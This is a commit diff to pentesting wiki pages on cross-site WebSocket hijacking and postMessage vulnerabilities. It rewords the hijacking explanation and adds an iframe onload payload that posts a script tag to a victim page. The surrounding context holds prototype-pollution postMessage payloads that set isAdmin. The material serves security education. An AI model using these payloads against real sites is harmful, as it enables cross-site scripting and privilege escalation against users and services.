GitBook: [#2843] upload send postmessage

pentesting-web/cross-site-websocket-hijacking-cswsh.md

@@ -83,9 +83,7 @@ An attacker can create a **malicious web page** on their own domain which **esta
 
 ### Simple Attack
 
-Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. 
-
-Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
+This attack allows you to make the client connect to websocket server and send some predefined value.
 
 ```markup
 <script>
@@ -102,6 +100,8 @@ function handleReply(event) {
 </script>
 ```
 
+Usually this will be useless as what you want is to get the information the real user is sending and the responses.
+
 ### Stealing data from user
 
 Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:

pentesting-web/postmessage-vulnerabilities.md

@@ -14,6 +14,9 @@ window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
 <iframe id="idframe" src="http://victim.com/"></iframe>
 document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
 
+# postMessage to an iframe via onload
+<iframe src="https://victim.com/" onload="this.contentWindow.postMessage('<script>print()</script>','*')">
+
 # postMessage to an URL
 window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
 ```